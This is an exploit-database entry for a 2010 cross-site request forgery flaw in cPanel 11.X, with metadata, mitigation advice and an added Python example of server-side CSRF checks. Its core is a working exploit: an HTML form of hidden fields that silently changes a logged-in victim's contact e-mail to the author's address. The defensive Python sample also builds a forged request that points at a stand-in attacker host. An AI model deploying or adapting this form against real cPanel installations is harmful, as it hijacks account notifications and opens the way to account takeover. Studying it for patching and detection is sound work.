Vendor: Cpanel
By: Mon7rF
CVSS: 5.5 (MEDIUM)
CWE: 352 (Cross Site Request Forgery)
Product Name: Cpanel
Affected Version From: Cpanel version 11.X
Affected Version To: Cpanel version 11.X
Patch Exists:
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 7
2010

Cpanel 11.X Edit E-mail Cross Site Request Forgery exploit

This exploit allows an attacker to perform unauthorized actions on behalf of a user by tricking them into clicking a specially crafted link or visiting a malicious website. In this case, the exploit targets the Cpanel 11.X Edit E-mail feature.

Mitigation:

To mitigate this vulnerability, users should be cautious when clicking on links or visiting websites, especially when prompted to enter sensitive information or perform actions that they did not initiate.
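The form in the raw data below carries no per-session secret, so the server cannot tell it apart from the panel's own form. The following Python is an added example (not cPanel's code and not part of the original advisory) of the server-side checks a state-changing handler can apply; the trusted origin, session id, `csrf_token` field name and function names are assumptions.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SERVER_KEY = secrets.token_bytes(32)           # per-deployment secret (generated here)
TRUSTED_ORIGIN = "https://panel.example:2083"  # assumed origin of the panel itself


def issue_token(session_id: str) -> str:
    """Value the panel puts in a hidden csrf_token field of its own form."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def same_origin(headers: dict) -> bool:
    """True only if Origin (or, failing that, Referer) is the panel itself."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == TRUSTED_ORIGIN


def check_save_email(method: str, headers: dict, session_id: str, form: dict):
    """Return (allowed, reason) for a request that changes the contact e-mail."""
    if method != "POST":
        return False, "state change must use POST"
    if not same_origin(headers):
        return False, "cross-origin or missing Origin/Referer"
    expected = issue_token(session_id).encode()
    if not hmac.compare_digest(form.get("csrf_token", "").encode(), expected):
        return False, "missing or invalid CSRF token"
    return True, "ok"


# Constructed sample requests for one logged-in session.
SESSION = "sess-1234"  # constructed session identifier
# A form with no method attribute is submitted as GET, from a foreign page.
FORGED = ("GET", {"Referer": "http://attacker.example/page.html"},
          {"email": "someone@attacker.example", "notify_disk_limit": "1"})
LEGIT = ("POST", {"Origin": TRUSTED_ORIGIN},
         {"email": "owner@example.org", "csrf_token": issue_token(SESSION)})

if __name__ == "__main__":
    for name, (method, headers, form) in (("forged", FORGED), ("legit", LEGIT)):
        print(name, check_save_email(method, headers, SESSION, form))
```

Each layer rejects the forged request on its own: the method check, the origin check, and the token bound to the victim's session.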

Exploit-DB raw data:

# Exploit Title: Cpanel 11.X Edit E-mail  Cross Site Request Forgery exploit
# Date: 22 - 10 - 2010
# Author: Mon7rF
# Mail : X0h@msn.com
# Tested on: Windows 7

--------------------------------------------------------------------------------------

<form onsubmit="return do_validate(this.id);" id="mainform" name="mainform"  
action="http://www.site.com:2082/frontend/x3/contact/saveemail.html">

<input id="email"                    name="email"                    type="hidden" value="X0h@msn.com">
<input id="second_email"             name="second_email"             type="hidden" value="">
<input id="notify_disk_limit"        name="notify_disk_limit"        type="hidden" value="1">
<input id="notify_bandwidth_limit"   name="notify_bandwidth_limit"   type="hidden" value="1">
<input id="notify_email_quota_limit" name="notify_email_quota_limit" type="hidden" value="1">

<input type="submit" class="input-button" value="Save">

</form>

--------------------------------------------------------------------------------------

Gr33ts : RENO - Mr.M3x - all Member p0c Team ..